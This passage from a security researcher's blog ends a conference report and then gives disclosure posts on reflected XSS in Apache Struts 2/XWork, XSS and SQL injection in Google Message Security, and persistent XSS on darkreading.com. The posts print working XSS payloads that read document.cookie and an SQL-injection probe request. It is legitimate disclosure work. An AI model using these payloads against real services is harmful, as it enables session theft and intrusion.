style="font-weight: bold;">Current State of Application Security</span>. 
He also introduced the work on the mobile developer guideline project done in collaboration with OWASP, as well as an on-going initiative on threat analysis of app store security. Finally, security implications of HTML5 and other related standards were discussed.<br /><br />The Attack series of presentations continued with the <span style="font-weight: bold;">Intranet Footprinting: Discovering resources from outside</span> presentation done by Javier Marcos De Prado and Juan Galiana Lara from IBM. Relying on exploitation of common Web application vulnerabilities including Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) and HTTP Response Splitting, several custom modules for BeEF (Browser Exploitation Framework) were introduced. Such custom BeEF modules allow browser-based port scanning, internal DNS discovery, OS detection, etc., using known approaches based on JavaScript code and CSS. An excellent presentation.<br /><br />Janne Uusilehto, head of Nokia product security, started the second day of plenary sessions with a talk on software security engineering - <span style="font-weight: bold;">Software Security is about coding securely, or is that all? </span>Some key points discussed - <span style="font-style: italic;">security is a process, not a product</span> & <span style="font-style: italic;">difficulty to ensure reasonable expectations towards software security</span>. An interesting presentation.</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />The Attack series of presentations resumed with <span style="font-weight: bold;">An Introduction to OWASP Zed Attack Proxy</span> done by Simon Bennetts. A great tool for developers looking for a quick automated security assessment of Web applications. With his software development background, I think Simon has a good chance to make the ZAP tool a worthy successor of Paros Proxy. 
Looking forward to ZAP updates - excellent work.<br /><br /><span style="font-weight: bold;">Testing Security Testing: Evaluating Quality of Security Testing</span> presented by Ofer Maor from Seeker Security discussed various aspects of security testing, with an emphasis on what could determine the quality of security testing - good and bad security testing.<br /><br />After this, I had a go with my own presentation <span style="font-weight: bold;">A Case Study on Enterprise E-mail (in)Security Solutions</span>. In an effort to increase awareness of the need to secure enterprise anti-spam and anti-virus solutions, I briefly introduced various e-mail security solutions ranging from software, hardware/software appliances and virtual appliances to cloud-based services (SaaS and IaaS). While most existing solutions rely on Web applications for remote administration and end-user quarantined e-mail management, exploitation of common vulnerabilities could allow internal and external attackers to gain access to and maintain control of various internal resources. Various case studies on identified vulnerabilities in products/services from Google, Symantec, IBM, Barracuda Networks, Astaro and Marshal were discussed, as well as some attacks which could exploit such vulnerabilities. 
Finally, in the context of benchmarking enterprise e-mail security solutions, I took the opportunity to announce the <a style="font-weight: bold;" href="https://www.owasp.org/index.php/OWASP_Security_Baseline_Project"><span style="color: rgb(0, 0, 102);">OWASP Security Baseline</span></a> project, as an independent way to benchmark the security of various enterprise solutions (including the security ones as well).<br /><br /><span style="font-weight: bold; color: rgb(0, 0, 102);">OWASP Security Baseline call for participation is now open, drop me a line for more details and if you are interested in contributing: </span><span style="color: rgb(0, 0, 102); font-weight: bold;">marian dot ventuneac at owasp.org</span> </span> <span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />The next keynote was delivered by Alex Lucas, principal security developer manager at Microsoft - <span style="font-weight: bold;">Science, SDL & Openness</span>. A good insight into what is being done to secure various Microsoft products, including automated fuzzing and how this led to improved product security, as well as the materials and tools available to support secure development and testing.<br /><br /><span style="font-weight: bold;">The Dark Side: Measuring and Analyzing Malicious Activity on Twitter</span> introduced the audience to recent research on analyzing and profiling suspicious/malicious Twitter accounts, lots of stats, trends, etc. 
Although the current percentage of malicious attacks identified by Barracuda Networks on Twitter is small (I think it was 1% of the analyzed data), such research has the potential to allow timely identification and (hopefully) prevention of any significant increase in such attacks.<br /><br />And finally, <span style="font-weight: bold;">Practical Crypto Attacks Against Web Applications</span> presented by Justin Clarke from GDS Security described practical techniques for exploiting crypto weaknesses identified in the ASP .NET framework, allowing padding oracle attacks against common Web applications - an excellent presentation.<br /><br />While high expectations were for Ivan Ristic's presentation closing the AppSec EU conference, unfortunately he was not able to attend. However, Arian Evans from WhiteHat Security did a great job of reminding us once again that we (as an industry) failed to deliver on the great promise of building secure software - and came with some useful suggestions. Hopefully it is not a lost battle - I believe OWASP greatly contributes to increasing awareness of application security, and the OWASP AppSec EU 2011 conference proves this once again.<br /><br />Congratulations to all conference organizers, this was an excellent AppSec event! I am looking forward to the next one.<br /><br /><br /></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com18tag:blogger.com,1999:blog-3780447711393906495.post-48345739673453844812011-05-10T13:04:00.000-07:002011-05-18T14:57:19.166-07:00Apache Struts 2, XWork, WebWork ... 
Reflected XSS Vulnerabilities<span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />The recently released Apache Struts 2.2.3 framework includes fixes for two reflected XSS vulnerabilities.</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />User-provided data is not properly escaped before being included in XWork-generated error messages, thus allowing successful reflected XSS attacks as described in the <a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://www.ventuneac.net/security-advisories/MVSA-11-006">MVSA-11-006</a> security advisory.</span><span style=";font-family:arial;font-size:100%;" ><span style="font-weight: bold; color: rgb(255, 0, 0);"><br /><br />NOTE: Other open source projects and commercial products relying on the XWork framework could be vulnerable to attacks similar to the ones described in this post.</span></span><span style=";font-family:arial;font-size:100%;" ><span style="font-weight: bold; color: rgb(255, 0, 0);"><br /><br />NOTE: </span></span><span style="color: rgb(255, 0, 0); font-weight: bold;font-family:arial;font-size:100%;" >The WebWork framework released by OpenSymphony (http://opensymphony.org) was already confirmed as vulnerable to reflected XSS attacks using similar vectors.</span><span style="font-size:100%;"> </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><span style="font-weight: bold;"><br /><br /><br />1. 
XSS payload injected in the name of the requested Struts actions</span><br /><br />Preconditions:</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /></span><ul style="color: rgb(0, 0, 0);font-family:arial;"><li><span style="font-size:100%;">no declarative error handling rule is defined in struts.xml using <global-exception-mappings> tag</span></li></ul><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >Test case: </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />http://test.app1.net/login%3Cimg%3E.action<br /><br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >HTML source code for the error displayed (HTTP response Content-Type is text/html)</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >:<span style="font-style: italic;"><br /><br />There is no Action mapped for namespace / and action name login<span style="font-weight: bold; color: rgb(255, 0, 0);"><img></span>.</span><br /><br />This allows successful reflected XSS attacks by injecting malicious scripting code into the name of requested Struts actions.<span style="font-weight: bold;"><br /><br /><br />2. 
Reflected XSS vulnerabilities in <s:submit> with DMI enabled</s:submit></span><br /><br />Preconditions: </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /></span><ul style="color: rgb(0, 0, 0);font-family:arial;"><li><span style="font-size:100%;">no declarative error handling rule is defined in struts.xml using the <global-exception-mappings> tag</global-exception-mappings></span></li><li><span style="font-size:100%;">Dynamic Method Invocation is enabled (this is enabled by default)</span></li><li><span style="font-size:100%;">the bang (action!method) syntax is used in JSP via the <s:submit> tag for calling Struts actions and methods</s:submit></span></li><li><span style="font-size:100%;">the requested method does not match an existing one defined in the Struts action implementation class</span></li><li><span style="font-size:100%;">the requested action does not match an existing one defined in struts.xml</span></li></ul><span style="color: rgb(0, 0, 0);font-size:100%;" ><span style="font-family:arial;">Example of <s:submit> tag usage with JSP:</span></span><span style="font-size:100%;"><br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><body><br />...<br /><form name="loginform" id="loginform" method="post" action=""><br />...<br /><s:submit action="login" method="cantLogin" name="cantlogin" key="cantlogin" /><br />...<br /></form><br />...<br /></body><br /></span><span style="font-size:100%;"><br /></span><span style="font-weight: bold;font-size:100%;" ><span style="color: rgb(0, 0, 0);font-family:arial;" ><br />2.1 Test case - XSS payload is injected in the action attribute of the </span></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><span><span style="color: rgb(0, 0, 0);font-family:arial;" ><span style="font-weight: bold;"><s:submit> </span></span></span><span style="font-weight: bold;">tag</span><br /><br />http://test.app.net/home.html?user=&password=<br 
/>&action!login%3cscript%3ealert(document.cookie)%3c/script%3e:cantLogin=some_name<br /><br />HTML source code for the error displayed (HTTP response Content-Type is text/html):<span style="font-style: italic;"><br /><br />There is no Action mapped for namespace / and action name login<span style="font-weight: bold; color: rgb(255, 0, 0);"><script>alert(document.cookie)</script></span>.</span><br /><br />NOTE: Without proper output escaping for the invoked action (which is controlled by the user), the injected malicious scripting code is executed by the browser (the HTTP response's content-type header is set to text/html).<br /><br />This allows successful reflected XSS attacks using <s:submit> tag.<br /><br /><span style="font-weight: bold;"><br />2.2 Test case - XSS payload is injected in method attribute of </span><span style="font-weight: bold;"> <s:submit> tag</span><br /><br />http://test.app.net/home.html?user=&password=&action!login:cantLogin</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >%3cscript%3ealert(document.cookie)%3c/script%3e</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >=some_name<br /><br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >HTML source code for the error displayed </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >(HTTP response Content-Type is text/html)<span style="font-style: italic;">:<br /><br /></span><span style="font-style: italic;"> some_path.action.LoginAction.cantLogin<span style="font-weight: bold; color: rgb(255, 0, 0);"><script>alert(document.cookie)</script></span>() </span><br /><br />NOTE: Without proper output escaping for the invoked method (which is controlled by the user), the injected scripting code will be executed by the browser (the HTTP response's content-type header is set to text/html).<br /><br />This allows successful reflected XSS attacks using <s:submit> tag.<br /><br />UPDATED (2011-05-18): 
The returned error also exposes internal paths for the Java class implementing the action for which we manipulate the method to be called (LoginAction in this case). </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(255, 0, 0);"><span style="color: rgb(0, 0, 0);">This issue is documented by </span></span></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://www.ventuneac.net/security-advisories/MVSA-11-007">MVSA-11-007</a><span style="color: rgb(0, 0, 102);"> </span>security advisory.</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(255, 0, 0);"><span style="color: rgb(0, 0, 0);"> </span><br /><br /><span style="font-weight: bold;">WebWork framework seems to be vulnerable to similar attacks. However, since the project is not actively maintained (being replaced by Apache Struts 2), there might be an option to look into building the project from source and to include similar fixes to those suggested for XWork </span></span><b style="color: rgb(255, 0, 0); font-weight: bold;">com.opensymphony.xwork2.DefaultActionProxy</b><span style="color: rgb(255, 0, 0); font-weight: bold;"> class patched in Struts 2.2.3 (details available at </span><a style="color: rgb(255, 0, 0); font-weight: bold;" href="https://issues.apache.org/jira/browse/WW-3579">https://issues.apache.org/jira/browse/WW-3579</a><span style="color: rgb(255, 0, 0); font-weight: bold;">).</span></span><span style="font-size:100%;"><br /><br /><br /></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com25tag:blogger.com,1999:blog-3780447711393906495.post-72552635230512297692010-09-15T11:42:00.000-07:002010-09-15T15:07:49.522-07:00Testing Google Message Security SaaS<span style="font-size:100%;"><br /></span><span style="font-weight: bold; color: rgb(204, 0, 0);font-family:arial;font-size:100%;" >NOTE: all the vulnerabilities 
discussed in this article were responsibly disclosed to Google back in January 2010. </span><span style="font-size:100%;"><span style="font-family:arial;"><br /><br />While driving an initiative on 'Testing the Enterprise Security Infrastructure', I spent some time at the beginning of the year assessing some SaaS (Software-as-a-Service) enterprise e-mail security solutions. Thus, I came across Google Message Security (powered by Postini). Bundled with Google Apps Premiere, you can easily get your hands on the Google e-mail security services for $50/year - a real bargain :) </span><span style="font-family:arial;"><br /><br />After setting up my Google Apps Premiere account, there it was. From the Apps account, two Google Message Security services were available: the Security Console (Admin console) - used to manage the organization resources (domains, users, filtering rules, etc), and the Message Center - used by the end-user to manage the quarantined e-mails and filtering settings. The Message Center comes in two flavors: Message Center II is the latest version (set by default for end-users). However, the older user interface known as Message Center Classic was still accessible to an authenticated user (after tweaking the URL a bit).</span><span style="font-family:arial;"><br /><br />The original plan was to refresh an older security test plan I used for assessing various products from Barracuda Networks and Symantec. However, I quickly realized that I got much more than I bargained for. The Google Message Security SaaS was affected by various security vulnerabilities, including multiple persistent and reflected Cross-Site Scripting (XSS), improper error handling, and the most interesting of all, SQL Injection.</span><span style="font-family:arial;"><br /><br />And here they are!</span></span><span style="font-weight: bold;font-family:arial;font-size:100%;" ><br /><br /><br />A. 
Multiple XSS vulnerabilities in Security Console<br /> (<a href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a>)</span><span style=";font-family:arial;font-size:100%;" ><br /><br />First, a persistent XSS vulnerability identified in the /exec/admin_orgs resource allows injecting and persistently storing malicious scripting code via the </span><span style=";font-family:arial;font-size:100%;" >setconf-neworg</span><span style=";font-family:arial;font-size:100%;" > parameter.</span><span style=";font-family:arial;font-size:85%;" ><br /><br />setconf-neworg=test%3Cimg+onmouseover%3D%22javascript%3A+alert%28document.cookie%29%22%3E</span><span style="font-size:100%;"><span style="font-family:arial;"><br /><br />The attack persisted malicious scripting code into the name of a new organization. When queried for details, the malicious scripting code successfully executed in the client's browser.</span><br /><br /></span><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid-WVqgBnB_7GBFJLzoIK380P4D9kFLiPp0JHh2Kxzh7-LuPGMPX5B3o32sF264ZZCY6IRM9jxYVFTFAPYFMcv-_nBhoT4MkvYgKYY4dTs0rdxD__Irr1HZzeojjYKVTA_zpTRPwEM/s1600/GMS-XSS1.jpg"><img style="cursor: pointer; width: 400px; height: 249px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid-WVqgBnB_7GBFJLzoIK380P4D9kFLiPp0JHh2Kxzh7-LuPGMPX5B3o32sF264ZZCY6IRM9jxYVFTFAPYFMcv-_nBhoT4MkvYgKYY4dTs0rdxD__Irr1HZzeojjYKVTA_zpTRPwEM/s400/GMS-XSS1.jpg" alt="" id="BLOGGER_PHOTO_ID_5517224382995884274" border="0" /></a><br /></div><span style="font-size:100%;"><screenshot face="arial" 1=""><br />Multiple reflected XSS vulnerabilities were also identified for the /exec/admin_list and /exec/admin_auth resources:<br /><br />- in ORGS and USERS > Organization<br /><span style="font-size:85%;"><br 
/>https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</span><br /><br /><span style="font-size:85%;">https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h&orgtagqs=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</span><br />...<br /><br />- in ORGS and USERS > Users<br /><br /><span style="font-size:85%;">https://ac-s200.postini.com/exec/admin_list?type=users&childorgs=0&type_of_user=all&addressqs=&aliases=1&childorgs=1”><>&Search=Search</span><!-- iframe --><br /><br />- in ORGS and USERS > Authorization<br /><span style="font-size:85%;"><br />POST /exec/admin_auth?action=display_summary HTTP/1.1<br />Host: ac-s200.postini.com<br />...<br />redir=+List+&targetAddress=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%2Fiframe%3E&targetOrg=%5Bdomain.com%5D+Account+Administrators&currentOrg=100059875</span><br /><br />... and so on.<br /><br /><br /><span style="font-weight: bold;">B. Multiple reflected XSS in Message Center Classic<br /> (<a href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a>)</span><br /><br />Following the submission of incorrectly formatted e-mails for the Approved and Blocked senders lists, injected malicious code was included in the invalid e-mail format error messages displayed to the user.<br /><br /><span style="font-size:85%;">POST /exec/MsgSet?action=change_MsgSettings HTTP/1.1<br />Host: mc-s200.postini.com<br />...<br />add-good_addresses=a%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Save+to+List&submit=Save+to+List</span><br /><br />The result is shown below:<br /><br /></screenshot></span><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixNDLlFUeD3OOhizCsAn6qelU3nqGipbVE40RPT6aL00FBsI2NvgSRh2BcFMA1fEDajNEFdnbFi5uA-wKmmN8xyqHZwoxyMhcbMB7bzvYdw6xDX6zxVHBPiiu1e4ofoid96lH4X8vg/s1600/GMS-XSS2.jpg"><img style="cursor: pointer; width: 400px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixNDLlFUeD3OOhizCsAn6qelU3nqGipbVE40RPT6aL00FBsI2NvgSRh2BcFMA1fEDajNEFdnbFi5uA-wKmmN8xyqHZwoxyMhcbMB7bzvYdw6xDX6zxVHBPiiu1e4ofoid96lH4X8vg/s400/GMS-XSS2.jpg" alt="" id="BLOGGER_PHOTO_ID_5517225178378302194" border="0" /></a><br /></div><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""><screenshot 2=""><br /><br /><span style="font-weight: bold;">C. Reflected XSS in Message Center II<br /> (</span><a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a><span style="font-weight: bold;">)</span><br /><br />Manipulation of the source_uri parameter of the /msgctr/message_display resource allowed reflected XSS attacks.<br /><br /><span style="font-size:85%;">https://ac-s200.postini.com/msgctr/message_display?id=yyy&trash=trash&source_uri=%2Fapp%2Fmsgctr%2Ftrash%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</span><br /><screenshot 3=""><br /><br /><span style="font-weight: bold;">D. Improper Error Handling in Security Console<br /> (</span><a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-003">MVSA-10-003</a><span style="font-weight: bold;">)</span><br /><br />Manipulation of the beg_date and end_date parameters of the /exec/adminRep resource returned the following error:<br /><br /><span style="font-size:85%;">----------------------<br />There was a problem processing your request. 
Please click the Back button and try again.<br /><br />If you continue to see the problem, please report it to your system administrator or support contact with the following information.<br /><br /></span><span style="font-size:85%;">Time: Thu Jan 21 23:53:08 2010 GMT Request ID: 20593BC6-06E8-11DF-93DD-E3695903FD3E<br /><br />Request URL: /exec/adminRep?action=displayReport&targetorgid=100059876&cat=out_virus&report=sender&beg_date=20100120%27&end_date=20100120&org_agg=orgh<br /><br />System: ac-s200.postini.com-<br /><br /><span style="color: rgb(204, 0, 0);">Message: function(): not a valid date at /product/build/folder1/folder2/component line 137.</span></span><br />----------------<br /><br />The returned error disclosed details about the component implementing the functionality, its location on the server, and the technology being used. It could be handy for devising further attacks ;)<br /><br /><br /><span style="font-weight: bold;">E. SQL Injection in Message Center II<br /> (</span><a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-001">MVSA-10-001</a><span style="font-weight: bold;">)</span><br /><br />Manipulation of the sort_direction parameter of the /junk_quarantine/process and /trash/process resources allowed successful SQL Injection attacks against the Message Center II service.<br /><br /><span style="font-size:85%;">POST https://mc-s200.postini.com/app/msgctr/junk_quarantine/process HTTP/1.1<br />Host: mc-s200.postini.com<br />...<br />Content-Type: multipart/form-data; boundary=---------------------------26418279386900<br />Content-Length: 1351<br />-----------------------------26418279386900<br />Content-Disposition: form-data; name="_submitted_junk_quarantine_form"<br />1<br />...<br />-----------------------------26418279386900<br />Content-Disposition: form-data; name="range_menu"<br />1-14<br />-----------------------------26418279386900<br />Content-Disposition: form-data; name="sort_menu"<br />from_asc<br 
/>-----------------------------26418279386900<br />Content-Disposition: form-data; name="sort_direction"<br />desc'<br />-----------------------------26418279386900<br />...</span><br /><br />The extra apostrophe used for the initial test caused the following system error:<br /><br /></screenshot></screenshot></screenshot></span><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfyM0doz9rubaVt8p9pQNO2vdfF5bDup7TjpgecwhQ52Jk6XoZwoXGwQzl9LBahdW9vl_HenLoFEXbv5k7ms_EfxDLdi6wcRICbengXOuXnxEKARndBffGZkxY_bQJNbA4OPaFOhZq/s1600/GMS-SQL1.jpg"><img style="cursor: pointer; width: 400px; height: 269px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfyM0doz9rubaVt8p9pQNO2vdfF5bDup7TjpgecwhQ52Jk6XoZwoXGwQzl9LBahdW9vl_HenLoFEXbv5k7ms_EfxDLdi6wcRICbengXOuXnxEKARndBffGZkxY_bQJNbA4OPaFOhZq/s400/GMS-SQL1.jpg" alt="" id="BLOGGER_PHOTO_ID_5517226319376529666" border="0" /></a><br /></div><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""><screenshot 2=""><screenshot 3=""><screenshot 4=""><br />Apart from providing details on the database engine used, error type and middleware settings, the returned error confirmed the service was vulnerable to SQL Injection. 
Additional test cases were devised to confirm the issue.<br /><br />As confirmed by the Google Security Team, such vulnerabilities were affecting Google Message Security releases 6_24 (January), 6_25 (Feb), 6_26 (March) and 6_27 (April). Additional details are available in the <a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-001">MVSA-10-001</a>, <a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a> and <a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-003">MVSA-10-003</a> security advisories.<br /><br />Enjoy!<br /><br /></screenshot></screenshot></screenshot></screenshot></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com8tag:blogger.com,1999:blog-3780447711393906495.post-76520047588200398402010-04-07T09:17:00.001-07:002010-04-07T11:53:35.463-07:00darkreading.com vulnerable to persistent XSS injected in published articles<span style="font-weight: bold;font-family:arial;" >...or 'When re-publishing app security material helps discover vulnerabilities in the publisher's Web application'...</span><br /><br /><span style="font-family:arial;">On 6th of April, darkreading.com published an article which describes 'meta-information XSS' (see 'Researcher Details New Class of Cross-Site Scripting Attack', available at http://darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml?articleID=224201569).</span><br /><br /><span style="font-family:arial;">The original article included a classic XSS test case, namely <script>alert(1)</script>. 
As a result of an existing XSS vulnerability in the darkreading.com web site, the XSS test case above inadvertently turned out to be a successful one, as shown below:</span><br /><br /><a style="font-family: arial;" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QKgxZP3DCaVtCD2VNqd3sbF7QmIpdnQvi-7nwyBz7A_mRa7jz0VuUbBJypupMR8NVcNAJeBGnuoZ2Zw8HZZdOxYsLxPQC-yaTfz4JYJLHUOaFMzY44q0hohu_5a_bgB8vYZ0-K0I/s1600/darkreadingXSS.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QKgxZP3DCaVtCD2VNqd3sbF7QmIpdnQvi-7nwyBz7A_mRa7jz0VuUbBJypupMR8NVcNAJeBGnuoZ2Zw8HZZdOxYsLxPQC-yaTfz4JYJLHUOaFMzY44q0hohu_5a_bgB8vYZ0-K0I/s320/darkreadingXSS.jpg" alt="" id="BLOGGER_PHOTO_ID_5457447408275162530" border="0" /></a><br /><br /><span style="font-family:arial;">Following a brief notice I sent today to Timothy Wilson (editor at darkreading.com), he confirmed the issue, also mentioning that it is now fixed.</span><br /><br /><span style="font-family:arial;">The HTML code from the original post (including the cited XSS test case):</span><br /><span style="font-family:arial;"><span style="font-style: italic;">a DNS TXT record that contains the value "<script>alert(1)</script>" and a service</span></span><br /><br /><span style="font-family:arial;">The HTML code for the current version of the article:</span><br /><span style="font-family:arial;"><span style="font-style: italic;">a DNS TXT record that contains [a certain value] and a service </span></span><br /><br /><span style="font-family:arial;">With the same article being reproduced by a significant number of online publications, it could be interesting to see how many others are also affected.</span><br /><br /><br />Marian 
Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com161